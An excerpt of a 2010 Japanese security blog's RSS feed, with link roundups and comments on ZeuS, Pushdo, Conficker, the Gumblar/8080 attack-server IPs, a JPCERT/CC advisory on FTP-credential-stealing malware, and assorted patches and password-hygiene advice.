<a href="http://www.atmarkit.co.jp/news/201002/02/mp3.html"><img src="http://www3.atword.jp/gnome/files/2009/10/ic_atit.gif" class="cIcon" alt="" />クラウド上で“カジュアル・コピー”が横行？</a><br />
<span class="cBurn">スルーカ</span>権行使！<br />
<br />
<a href="http://blog.damballa.com/?p=550"><img src="http://www3.atword.jp/gnome/files/2010/01/ic_thedaybeforezero.gif" class="cIcon" alt="" />Killing Antivirus, One DLL At A Time</a><br />
<br />
----------<br />
<strong>Pushdo Rampages</strong><br />
<a href="http://www.iss.net/threats/pushdoSSLDDoS.html"><img src="http://www3.atword.jp/gnome/files/2009/03/ico_ibm.gif" class="cIcon" alt="" />Pushdo SSL DDoS Attacks</a><br />
まだ続いている様子<br />
<br />
----------<br />
<strong>ZeuSも元気いっぱい</strong><br />
<a href="http://garwarner.blogspot.com/2010/02/minipost-fake-photo-zeus.html"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_blogger.gif" class="cIcon" alt="" />Minipost: Fake Photo Zeus -- GarWarner</a><br />
<a href="http://www.virustotal.com/analisis/04aef82e6036c97c1287dec5f8789384b3ab539210750f262b4d4715835c37c5-1265211217"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_virustotal.gif" class="cIcon" alt="" />PhotoArchive.exe</a><span class="cBurn">7</span>/40 (17.50%)<br />
<br />
<a href="http://ddanchev.blogspot.com/2010/02/photoarchive-crimewareclient-side.html"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_blogger.gif" class="cIcon" alt="" />PhotoArchive Crimeware/Client-Side Exploits Serving Campaign in the Wild -- ddanchev</a><br />
ZDnetでおなじみの、Dancho Danchev氏は pushdoとの関連も指摘しています。<br />
<br />
and ! Happy Birthday !<br />
<a href="http://www.abuse.ch/?p=2363"><img src="http://www3.atword.jp/gnome/files/2009/10/ic_abuce_ch.gif" class="cIcon" alt="" />Happy Birthday ZeuS Tracker!</a><br />
<span class="cRefer">During the last year, ZeuS Tracker has tracked more then 2′800  malicious ZeuS C&amp;C servers. The ZeuS Tracker has captured more then 360MB ZeuS config files and 330MB binaries.</span><br />
also Thanks 1und1<br />
<br />
----------<br />
<strong>MiFi cracked</strong><br />
<a href="http://threatpost.com/en_us/blogs/verizon-mifi-device-hacked-020310"><img src="http://www3.atword.jp/gnome/files/2010/01/ic_threatpost.gif" class="cIcon" alt="" />Verizon MiFi Device Hacked</a><br />
長い・・<br />
<span class="cRefer">Fortunately, there are a couple of options available to us to mitigate this attack.<br />
    * Change the Default PSK <br />
    * Change the Default SSIDC</span><br />
<a href="http://en.wikipedia.org/wiki/MiFi"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />Mifi</a> : myWiFi<br />
<br />
----------<br />
<strong>Conficker掃討作戦</strong><br />
in マンチェスター警察<br />
<a href="http://www.theregister.co.uk/2010/02/03/gmp_conficker_recovery/"><img src="http://www3.atword.jp/gnome/files/2009/07/ic_the_register.gif" class="cIcon" alt="" />Manchester cops recover from Conficker</a><br />
<span class="cRefer">It is still not clear where the virus has come from but we are investigating how this has happened and are taking steps to prevent this from happening again.</span><br />
感染経路は不明っと<br />
<span class="cRefer">The council infection of February wound up costing taxpayers £1.5m in lost parking ticket revenue and security clean-up fees.</span><br />
<br />
----------<br />
<strong>反撃</strong><br />
<a href="http://blogs.zdnet.com/gadgetreviews/?p=12033&amp;tag=wrapper;col1"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_zdnet.gif" class="cIcon" alt="" />Adobe strikes back at Apple over iPad/Flash debacle</a><br />
<a href="http://blogs.adobe.com/conversations/2010/02/open_access_to_content_and_app.html"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_adobe.gif" class="cIcon" alt="" />Open Access to Content and Applications</a><br />
<br />
<span class="cHide">どっちもセキュリティホールを掘るのは得意なんですけどね・・・</span><br />
<br />
----------<br />
<strong>malcode with WordPress</strong><br />
<a href="http://badwarebusters.org/main/itemview/14451"><img src="http://www3.atword.jp/gnome/files/2009/10/ic_stop_badware.gif" class="cIcon" alt="" />Wordpress obfuscated javascript pointing to centiyo mal </a><br />
ああ・・どっかでみたコードがっ（笑）<br />
<br />
----------<br />
<strong>沿革</strong><br />
<a href="http://www.smilebanana.com/archives/2010/02/03-2145.php#more"><img src="http://www3.atword.jp/gnome/files/2010/01/ic_smilebanana.gif" class="cIcon" alt="" />8080系(いわゆるガンブラー系)記事のまとめ</a><br />
<span class="cRefer">結論：あるふぁぶろがーこわい</span><br />
怖い怖い・・・<br />
<span class="cHide">錬勤術のほうも気をつけましょうね（気をつけようがないのかっ！）<br />
※手当てなしの勤務の場合はなんて呼ぶのかな（苦笑）</span><br />
<br />
----------<br />
<strong>8080</strong><br />
<span class="cBurn">66.225.192.2</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:23352"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS23352</a>(<a href="http://www.servercentral.net/aboutus">SERVERCENTRAL</a>)<img src="http://www3.atword.jp/gnome/files/2009/02/flag-usa.jpg" class="cFlag" alt="" title="米" /> IL(Chicago)<br />
<span class="cBurn">83.1.83.4</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:5617"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS5617</a>(Polish Telecom) <img src="http://www3.atword.jp/gnome/files/2009/04/flag-poland.jpg" class="cFlag" alt="" title="ポーランド" /><br />
<span class="cBurn">200.35.148.184</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:15083"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS15083</a>(INFOLINK) <img src="http://www3.atword.jp/gnome/files/2009/02/flag-usa.jpg" class="cFlag" alt="" title="米" />FL<br />
<span class="cBurn">213.39.123.11</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:8928"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS8928</a>(INTEROUTE) <img src="http://www3.atword.jp/gnome/files/2010/02/flag-switzerland.gif" class="cFlag" alt="" title="スイス" /><br />
<span class="cBurn">83.222.30.178</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:25532"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS25532</a>(MASTERHOST) <img src="http://www3.atword.jp/gnome/files/2009/05/flag-russian.jpg" class="cFlag" alt="" title="ロシア" /><br />
<span class="cBurn">88.255.162.14</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:9121"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS9121</a>(TTNET) <img src="http://www3.atword.jp/gnome/files/2009/10/flag_turkey.gif" class="cFlag" alt="" title="トルコ" /><br />
<span class="cBurn">212.146.105.75</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:5606"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS5606</a>(KQRO) <img src="http://www3.atword.jp/gnome/files/2009/05/flag-romania.jpg" class="cFlag" alt="" title="ルーマニア" /><br />
<span class="cAttention">87.118.90.76</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:31103"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS31103</a>(KEYWEB-AS) <img src="http://www3.atword.jp/gnome/files/2009/04/flag-germany.jpg" class="cFlag" alt="" title="ドイツ" /><br />
<br />
激しく攻撃サーバホスティングの変更が行われました。<br />
というか勤勉にも程が・・<br />
<br />
----------<br />
<strong>Google Safe Browsing</strong><br />
| 1265227216 | B    | [goog-black-hash 1.50250 update] <br />
| 1265227201 | M    | [goog-malware-hash 1.19108 update]    <br />
|   299554 | +6032(293522) 反転<br />
|  1310611 | <br />
EoF<br />
</p>
]]></content:encoded>
			<wfw:commentRss>http://www3.atword.jp/gnome/2010/02/04/feb-04-2010-th/feed/</wfw:commentRss>
		<xhtml:link rel="alternate" media="handheld" type="text/html" href="http://www3.atword.jp/gnome/2010/02/04/feb-04-2010-th/" />
	</item>
		<item>
		<title>[NOTICE] がんぶらー'ed される FTP list</title>
		<link>http://www3.atword.jp/gnome/2010/02/03/notice-i-cannot-find-any-ftp-client-that-seems-safety/</link>
		<comments>http://www3.atword.jp/gnome/2010/02/03/notice-i-cannot-find-any-ftp-client-that-seems-safety/#comments</comments>
		<pubDate>Wed, 03 Feb 2010 12:00:28 +0000</pubDate>
		<dc:creator>gnome</dc:creator>
		
		<category><![CDATA[Announce]]></category>

		<category><![CDATA[security]]></category>

		<category><![CDATA[JPCERT/CC]]></category>

		<guid isPermaLink="false">http://www3.atword.jp/gnome/?p=7377</guid>
		<description><![CDATA[
FTP アカウント情報を盗むマルウエアに関する注意喚起
このアカウント窃取の対象となるソフトウエアは、FTP クライアントを含む複数の製品にのぼります。JPCERT/CC では、以下の FTP クライアントにてマルウエ [...]]]></description>
			<content:encoded><![CDATA[<p>
<a href="http://www.jpcert.or.jp/at/2010/at100005.txt"><img src="http://www3.atword.jp/gnome/files/2009/12/ic_jpcertcc.gif" class="cIcon" alt="" />FTP アカウント情報を盗むマルウエアに関する注意喚起</a><br />
<span class="cRefer">このアカウント窃取の対象となるソフトウエアは、FTP クライアントを含む複数の製品にのぼります。JPCERT/CC では、以下の FTP クライアントにてマルウエアによるアカウント窃取、および外部サーバへのアカウント情報の送信を確認しました。<br />
<br />
   - <a href="http://www.altools.jp/product/alftp/intro.aspx">ALFTP</a> 5.2 beta1<br />
   - <a href="http://www.bpftp.com/">BulletPloof FTP Client</a> 2009.72.0.64<br />
   - <a href="http://jp.emftp.com/">EmFTP</a> 2.02.2<br />
   - <a href="http://www2.biglobe.ne.jp/~sota/ffftp.html2"><img src="http://www3.atword.jp/gnome/files/2010/01/ic_sota.gif" class="cIcon" alt="" />FFFTP</a> 1.96d<br />
   - <a href="http://filezilla-project.org/"><img src="http://www3.atword.jp/gnome/files/2010/01/ic_filezilla.gif" class="cIcon" alt="" />FileZilla</a> 3.3.1<br />
   - <a href="http://www.flashfxp.com/">FlashFXP</a> 3.6<br />
   - <a href="http://www.frigate3.com/index.php">Frigate</a> 3.36<br />
   - <a href="http://www.internet-soft.com/ftpcomm.htm">FTP Commander</a> 8<br />
   - <a href="http://www.softwarea.com/ftp.htm">FTP Navigator</a> 7.77<br />
   - <a href="http://www.network-client.com/ftpnow/index.htm">FTP Now</a> 2.6.93<br />
   - <a href="http://www.ftprush.com/">FTP Rush</a> 1.1b<br />
   - <a href="http://www.smartftp.com/?lang=ja-jp">SmartFTP</a> 4.0.1072.0<br />
   - <a href="http://www.ghisler.com/">Total Commander</a> 7.50a<br />
   - <a href="http://www.click-now.net/html/UltraFXP.htm">UltraFXP</a> 1.07 ※公式サイト http://www.ultrafxp.com 消失<br />
   - <a href="http://winscp.net/eng/index.php"><img src="http://www3.atword.jp/gnome/files/2010/01/ic_winscp.gif" class="cIcon" alt="" />WinSCP</a> 4.2.5<br />
<br />
  上記に加えて、以下の Web ブラウザのアカウント管理機能を用いて保存され<br />
ている情報をマルウエアが窃取し、外部サーバに送信している事を確認しまし<br />
た。<br />
<br />
   - <a href="http://www.microsoft.com/japan/windows/ie/downloads/ie6sp1/default.mspx"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_microsoft.gif" class="cIcon" alt="" />Microsoft社 Internet Explorer 6</a><br />
     (Internet Explore 7 および 8 ではアカウント窃取は確認されておりません)<br />
   - Opera社 <a href="http://jp.opera.com/"><img src="http://www3.atword.jp/gnome/files/2009/05/ico_opera.gif" class="cIcon" alt="" />Opera</a> 10.10</span><br />
<br />
JPCERT/CCが、自信を持って名指ししてますので、十分に検証したのでしょうネ。<br />
以前に Unmask Parasitesが挙げた「<a href="http://blog.unmaskparasites.com/2009/09/23/10-ftp-clients-malware-steals-credentials-from/"><img src="http://www3.atword.jp/gnome/files/2009/05/ico_unmask_parasites.gif" class="cIcon" alt="" />
使用すべきでない10のFTPクライアント</a>」と比較すると、さらに使用すべきでないFTPクライアントが増えてしまいます。<br />
<br />
こうなると、印象的に安心して使える FTPクライアントがすごく限られてしまうような・・・<br />
<br />
何度も言っているように、まずは「感染しないこと」が重要なのは言うまでもありません。<br />
<br />
※どっちのマルウェアの検証結果なのか謎ですが、恐らくは 8080/QuickSilver のことを指していると思われます<br />
<br />
------<br />
結果的に、key(id_rsaなど）を登録できる環境下にあるなら　FTP を捨て、SFTP(SSH L2) による鍵認証+パスフレーズが一番いいような気がしてきました。<br />
<a href="http://www.st.ryukoku.ac.jp/~kjm/security/memo/2010/02.html#20100202__FileZilla"><img src="http://www3.atword.jp/gnome/files/2009/04/ico_securityholememo.gif" class="cIcon" alt="" />公開鍵認証と認証エージェントを併用する</a><br />
<span class="cRefer">FileZilla 側には一切パスワードを入力せずに接続できるようになります。 </span><br />
<br />
これなら FileZillaでも、WinSCPでもOK・・・かな<br />
問題は 22 番をどこか別のPortに移動して、shellを抑制する(rsshなど）をきちんと設定することですが・・<br />
<br />
</p>
]]></content:encoded>
			<wfw:commentRss>http://www3.atword.jp/gnome/2010/02/03/notice-i-cannot-find-any-ftp-client-that-seems-safety/feed/</wfw:commentRss>
		<xhtml:link rel="alternate" media="handheld" type="text/html" href="http://www3.atword.jp/gnome/2010/02/03/notice-i-cannot-find-any-ftp-client-that-seems-safety/" />
	</item>
		<item>
		<title>2010.02.03 恵方巻</title>
		<link>http://www3.atword.jp/gnome/2010/02/03/feb-03-2010-grab-lucky-direction-roll-without-breath/</link>
		<comments>http://www3.atword.jp/gnome/2010/02/03/feb-03-2010-grab-lucky-direction-roll-without-breath/#comments</comments>
		<pubDate>Wed, 03 Feb 2010 00:13:07 +0000</pubDate>
		<dc:creator>gnome</dc:creator>
		
		<category><![CDATA[security]]></category>

		<category><![CDATA[@IT]]></category>

		<category><![CDATA[AMTSO]]></category>

		<category><![CDATA[Apple]]></category>

		<category><![CDATA[badwarebusters]]></category>

		<category><![CDATA[benesse]]></category>

		<category><![CDATA[cNotes]]></category>

		<category><![CDATA[Conficker]]></category>

		<category><![CDATA[ddanchev]]></category>

		<category><![CDATA[eWeek]]></category>

		<category><![CDATA[GreaseMonkey]]></category>

		<category><![CDATA[heise]]></category>

		<category><![CDATA[iPhone]]></category>

		<category><![CDATA[ITmedia]]></category>

		<category><![CDATA[ITPro]]></category>

		<category><![CDATA[Koobface]]></category>

		<category><![CDATA[Mcafee]]></category>

		<category><![CDATA[Microsoft]]></category>

		<category><![CDATA[NETZNER]]></category>

		<category><![CDATA[Pushdo]]></category>

		<category><![CDATA[SANS]]></category>

		<category><![CDATA[SecurityFocus]]></category>

		<category><![CDATA[slashdot]]></category>

		<category><![CDATA[softbank]]></category>

		<category><![CDATA[Sophos]]></category>

		<category><![CDATA[Squid]]></category>

		<category><![CDATA[Symantec]]></category>

		<category><![CDATA[TBS]]></category>

		<category><![CDATA[TechCrunch]]></category>

		<category><![CDATA[TheRegister]]></category>

		<category><![CDATA[ThreatPost]]></category>

		<category><![CDATA[TrendMicro]]></category>

		<category><![CDATA[Trusteer]]></category>

		<category><![CDATA[Twitter]]></category>

		<category><![CDATA[wordpress]]></category>

		<category><![CDATA[Yahoo]]></category>

		<category><![CDATA[ZDNet]]></category>

		<category><![CDATA[Zimuse]]></category>

		<guid isPermaLink="false">http://www3.atword.jp/gnome/?p=7368</guid>
		<description><![CDATA[
slugは冗談ですので、本気にしないでね（苦笑）

節分
のり巻きの日 
1987年、全国海苔貝類漁業協同組合連合会が制定
大岡越前の日
1717年2月3日に、大岡忠相が南町奉行に就任した。
チューリップ・バブル崩壊。 [...]]]></description>
			<content:encoded><![CDATA[<p>
<span class="cCom">slugは冗談ですので、本気にしないでね（苦笑）</span><br />
<div class="div10refer"></div>
<a href="http://ja.wikipedia.org/wiki/%E7%AF%80%E5%88%86"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />節分</a><br />
<a href="http://ja.wikipedia.org/wiki/%E3%81%AE%E3%82%8A"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />のり</a>巻きの日 <br />
<div class="div10refer">1987年、<a href="http://www.zennori.or.jp/">全国海苔貝類漁業協同組合連合会</a>が制定</div>
<a href="http://ja.wikipedia.org/wiki/%E5%A4%A7%E5%B2%A1%E8%B6%8A%E5%89%8D"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />大岡越前</a>の日<br />
<div class="div10refer">1717年2月3日に、<a href="http://ja.wikipedia.org/wiki/%E5%A4%A7%E5%B2%A1%E5%BF%A0%E7%9B%B8"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />大岡忠相</a>が<a href="http://ja.wikipedia.org/wiki/%E5%8D%97%E7%94%BA%E5%A5%89%E8%A1%8C"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />南町奉行</a>に就任した。</div>
<a href="http://ja.wikipedia.org/wiki/%E3%83%81%E3%83%A5%E3%83%BC%E3%83%AA%E3%83%83%E3%83%97%E3%83%BB%E3%83%90%E3%83%96%E3%83%AB"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />チューリップ・バブル</a>崩壊。(1637)<br />
<a href="http://ja.wikipedia.org/wiki/%E3%82%AA%E3%83%BC%E3%83%97%E3%83%B3%E3%82%BD%E3%83%BC%E3%82%B9"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />オープンソース</a>誕生の日 (1998)<br />
<div class="div10refer"><a href="http://opensource.org/history">History of the OSI</a><br />
The 'open source' label was invented at a strategy session held on February 3rd, 1998 in Palo Alto, California</div>
<br />
----------<br />
<br />
今日は、大きな話は無いんですが、細かいのが沢山・・・<br />
<br />
----------<br />
<strong>C.I.A</strong><br />
<a href="http://www.tbs.co.jp/kids/cia/"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_tbs.gif" class="cIcon" alt="" />C.I.Aサイバー・インテリジェント・エンジェルズ</a><br />
presented by TBS, Microsoft and Yahoo<br />
<br />
<a href="http://itpro.nikkeibp.co.jp/article/NEWS/20100202/344096/?ST=security"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_it_nikkei.gif" class="cIcon" alt="" />秘密組織“C.I.A”がネットの平和を守る！---TBSなど3社が情報セキュリティ啓発キャンペーン </a><br />
<a href="http://www.itmedia.co.jp/enterprise/articles/1002/02/news063.html"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_itmedia.gif" class="cIcon" alt="" />中高生に情報セキュリティを知ってもらおう――MSとTBS、ヤフーが始動</a><br />
<span class="cCom">小野寺さんは脱がないのかっ（笑）</span><br />
<a href="http://blogs.technet.com/jpsecurity/archive/2010/02/02/3310020.aspx"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_msdn.gif" class="cIcon" alt="" />サイバー・インテリジェント・エンジェルズ</a><br />
<a href="http://special.security.yahoo.co.jp/"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_yahoo.gif" class="cIcon" alt="" />ネットの安全特集2010春</a><br />
<a href="http://www.soumu.go.jp/main_sosiki/joho_tsusin/security/kiso/k00.htm"><img src="http://www3.atword.jp/gnome/files/2009/09/ic_mic_soumu.gif" class="cIcon" alt="" />インターネットと情報セキュリティの基礎知識</a><br />
<br />
２月は情報セキュリティ月間です。<br />
<span class="cCom">スルー力を発揮して、余計なこと<span class="cHide">それにしてもすごいコラボ・・・</span>は言わないでおこう・・</span><br />
<br />
----------<br />
<strong>MASS Password Reset via Twitter</strong><br />
<a href="http://twitter.com/safety/status/8548404485"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_twitter.gif" class="cIcon" alt="" />@safety</a><br />
<span class="cRefer">Got an email from us saying we've reset your password? A small # of accts seemed possibly affected offsite &amp; we took a precautionary step.</span><br />
<a href="http://jp.techcrunch.com/archives/20100202twitter-phishing-attack-update/"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_techcrunch.gif" class="cIcon" alt="" />ご注意―Twitter、フィッシング攻撃を受けたと認める</a><br />
<a href="http://isc.sans.org/diary.html?storyid=8137"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_sans.gif" class="cIcon" alt="" />Twitter Mass Password Reset due to Phishing</a><br />
<span class="cAttention">フィッシングではなく本当にパスワード変更が行われています。</span><br />
メールがやってきた方は、まずメールを破棄、以下のサイトからパスワードの変更を行ってください。<br />
<a href="https://www.twitter.com"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_twitter.gif" class="cIcon" alt="" />http<span class="cDanger">s</span>://www.twitter.com</a><br />
<br />
<span class="cRefer">do not reuse the password, do not use a simple password scheme (like "twitterpassword" and "facebookpassword")</span><br />
also don't <a href="http://jp.techcrunch.com/archives/20100121depressing-analysis-of-rockyou-hacked-passwords/"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_techcrunch.gif" class="cIcon" alt="" />"123456"</a> and similar =) and of course not <a href="http://jp.techcrunch.com/archives/20090715another-security-tip-for-twitter-dont-use-password-as-your-password/"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_techcrunch.gif" class="cIcon" alt="" />"password"</a><br />
<br />
関連：<br />
<a href="http://www.securityfocus.com/news/11573"><img src="http://www3.atword.jp/gnome/files/2009/05/ico_securityfocus.gif" class="cIcon" alt="" />Most consumers reuse banking passwords</a><br />
<span class="cRefer">Online security firm Trusteer reports that 73 per cent of bank customers use their online account password to access at least one other, less sensitive website. Even worse, around half (47 per cent) use the same online banking username and password for other website logins.</span><br />
<a href="http://www.trusteer.com/sites/default/files/cross-logins-advisory.pdf"><img src="http://www3.atword.jp/gnome/files/2009/08/ic_trusteer.gif" class="cIcon" alt="" />Reused Login Credentials<img src="http://www3.atword.jp/gnome/files/2009/02/ico_pdf.gif" class="cIcon" alt="" /></a><br />
<br />
----------<br />
<strong></strong><br />
<a href="http://support.apple.com/kb/HT4013"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_apple.gif" class="cIcon" alt="" />About the security content of iPhone OS 3.1.3 and iPhone OS 3.1.3 for iPod touch</a><br />
<a href="http://blogs.zdnet.com/security/?p=5381"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_zdnet.gif" class="cIcon" alt="" />Code execution holes in iPhone OS, iPod Touch</a><br />
<span class="cRefer">The most serious flaw could allow remote code execution if an iPhone/iPod Touch user opens audio and image files.<br />
<br />
<u>This iPhone/iPod Touch update is only available through iTunes</u> and will not appear in the software update utility available in Mac and Windows systems.</span><br />
iPod Touchは無償で受けられるのかな？<br />
<br />
続く<br />
----------<br />
<strong>iPhone Certの脆弱性？</strong><br />
<a href="http://threatpost.com/en_us/blogs/iphones-vulnerable-new-remote-attack-020210"><img src="http://www3.atword.jp/gnome/files/2010/01/ic_threatpost.gif" class="cIcon" alt="" />iPhones Vulnerable to New Remote Attack</a><br />
ナナメ読みなのでアレですが、<br />
<span class="cRefer">Appleのroot CAが iPhone用とその他でIDが違うと、違う証明書発行元(CN)、違うシリアル番号なのに、KeyIDが同じっては、同一の証明書をIDだけ変えて使い回ししてるんじゃない？</span><br />
という話かな？<br />
即、リモートコード実行や、不正規なソフトの自動アップグレードにつながる性質のものでは無いようですが、何とも言えない脆弱性（？）ですね・・<br />
<span class="cRefer">"You can make any part of the phone not work. You definitely don't get to run code, but there's lots of nasty things you can do. You can make applications not work, make it so that you can't remove this config file," Miller said. "At the very least, <u>you can make someone's day miserable</u>."</span><br />
<br />
ソース：匿名のpost<br />
<a href="http://cryptopath.wordpress.com/2010/01/"><img src="http://www3.atword.jp/gnome/files/2009/06/ic_wordpress-1.gif" class="cIcon" alt="" />iPhone PKI handling flaws -- Cryptopath</a><br />
<br />
微妙に続く<br />
----------<br />
<strong>Koobface thru MacOS</strong><br />
<a href="http://ddanchev.blogspot.com/2010/02/how-koobface-gang-monetizes-mac-os-x.html"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_blogger.gif" class="cIcon" alt="" />How the Koobface Gang Monetizes Mac OS X Traffic</a><br />
MacOSからのアクセスだけを別の場所に飛ばすKoobfaceの新手法<br />
MacOS系のウィルス・マルウェアはあまり聞かないですが、こういった形でアフィ踏み台になってる人は意外と多いのかも？<br />
<br />
<a href="http://www.google.com/safebrowsing/diagnostic?site=AS:9394"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS9394</a>(CRNET-CHINA RAILWAY)<img src="http://www3.atword.jp/gnome/files/2009/05/flag-china.jpg" class="cFlag" alt="" /><br />
相変わらず、<a href="http://www.robtex.com/as/as9394.html#bgp"><img src="http://www3.atword.jp/gnome/files/2009/07/ic_robtex.gif" class="cIcon" alt="" />謎なBGP運用</a>してるなァ・・<br />
<br />
こっちはウクライナの（偽）デートサイト<br />
<span class="cBurn">62.90.136.237</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:1680"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS1680</a>(NV-ASN 013) <img src="http://www3.atword.jp/gnome/files/2009/11/flag_israel.gif" class="cFlag" alt="" /><br />
<br />
アクセスログにこういったのが残っていたら注意しましょう。<br />
<br />
----------<br />
<strong>Pushdo rampage continues</strong><br />
<a href="http://isc.sans.org/diary.html?storyid=8131"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_sans.gif" class="cIcon" alt="" />Pushdo Update</a><br />
続いているようですね・・国内の感染ノードも存在するようですので、注意しましょう（どうやって！？）<br />
<span class="cCom">※自自律系の中に 443を撃ちまくってるノードが無いか確認カナ</span><br />
<br />
----------<br />
<strong>Conficker</strong><br />
<a href="http://www.theregister.co.uk/2010/02/02/gmp_conficker/"><img src="http://www3.atword.jp/gnome/files/2009/07/ic_the_register.gif" class="cIcon" alt="" />Manchester cops clobbered by Conficker</a><br />
<span class="cRefer">Greater Manchester Police's computer network has been infected by the infamous Conficker worm, leaving beat cops unable to run computer checks on suspected criminals and vehicles for the last three days.</span><br />
やっぱりまだ居るんですね・・<br />
天然痘とか、コレラみたいな印象ですが・・・<br />
<br />
<a href="http://www.h-online.com/security/news/item/Conficker-cause-of-Greater-Manchester-Police-disconnection-920106.html"><img src="http://www3.atword.jp/gnome/files/2009/08/ic_h-security.gif" class="cIcon" alt="" />Conficker cause of Greater Manchester Police disconnection</a><br />
<a href="http://news.bbc.co.uk/2/hi/uk_news/england/manchester/8492669.stm"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_bbc.gif" class="cIcon" alt="" />Conficker virus hits Manchester Police computers </a><br />
<br />
----------<br />
<strong>イカ君</strong><br />
<a href="http://www.h-online.com/security/news/item/Squid-update-fixes-DoS-vulnerability-919979.html"><img src="http://www3.atword.jp/gnome/files/2009/08/ic_h-security.gif" class="cIcon" alt="" />Squid update fixes DoS vulnerability </a><br />
<a href="http://secunia.com/advisories/38455/"><img src="http://www3.atword.jp/gnome/files/2009/06/ic_secunia.gif" class="cIcon" alt="" />Squid DNS Packet Processing Denial of Service Vulnerability</a> <span class="cLess">2</span><br />
<a href="http://secunia.com/advisories/38451/"><img src="http://www3.atword.jp/gnome/files/2009/06/ic_secunia.gif" class="cIcon" alt="" />Squid DNS Packet Processing Denial of Service Vulnerability</a> <span class="cLess">2</span><br />
Update to <a href="http://www.squid-cache.org/Download/"><img src="http://www3.atword.jp/gnome/files/2009/08/ic_squid.gif" class="cIcon" alt="" />Squid 3.0.STABLE22 or apply patch</a>.<br />
<br />
----------<br />
<strong>WordPress</strong><br />
<a href="http://www.sophos.com/blogs/sophoslabs/v/post/8498"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_sophos.gif" class="cIcon" alt="" />Wordpress injection attack and “affiliate ping-pong”</a><br />
激しく既視感のあるインジェクションコードですね・・<br />
<br />
WordPressの現行バージョンは <a href="http://ja.wordpress.org/"><img src="http://www3.atword.jp/gnome/files/2009/06/ic_wordpress-1.gif" class="cIcon" alt="" />2.9.1</a> です<br />
なのですよ！ &gt; ATWORDさん<br />
<br />
----------<br />
<strong>？</strong><br />
<a href="http://blog.trendmicro.com/on-the-trustworthiness-of-the-av-industry-and-av-tests/"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_trendmicro.gif" class="cIcon" alt="" />On the Trustworthiness of the AV Industry and AV Tests</a><br />
で・・？（<span class="cCom">とか書くと、またあちこちで物議を醸すのカナ？</span>）<br />
<br />
AMTSOに権限をもっと持たせろ！という点にだけは賛成！<br />
<br />
----------<br />
<strong>オンラインヘルプにご注意</strong><br />
<a href="http://www.avertlabs.com/research/blog/index.php/2010/02/02/be-careful-on-help-files/"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_mcafee.gif" class="cIcon" alt="" />Be careful on help files</a><br />
<span class="cRefer">Earlier variants of “Muster” drop encoded copies of main backdoor components in filenames with the extension “.hlp”. These “.hlp”files are later decrypted with Microsoft CryptAPI with hardcoded keys and executed by loaders.</span><br />
<span class="cBurn">“upgraderUI.exe”with the registry key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run AutoPatch</span><br />
<br />
----------<br />
<strong>Zimuse</strong><br />
<a href="http://www.symantec.com/connect/ja/blogs/password-protected-word-document-w32zimuse"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_symantec.gif" class="cIcon" alt="" />Password-Protected Word Document In W32.Zimuse</a><br />
こないだの、チェコ語のパズルウィルスですね<br />
<br />
----------<br />
<strong>やばい！</strong><br />
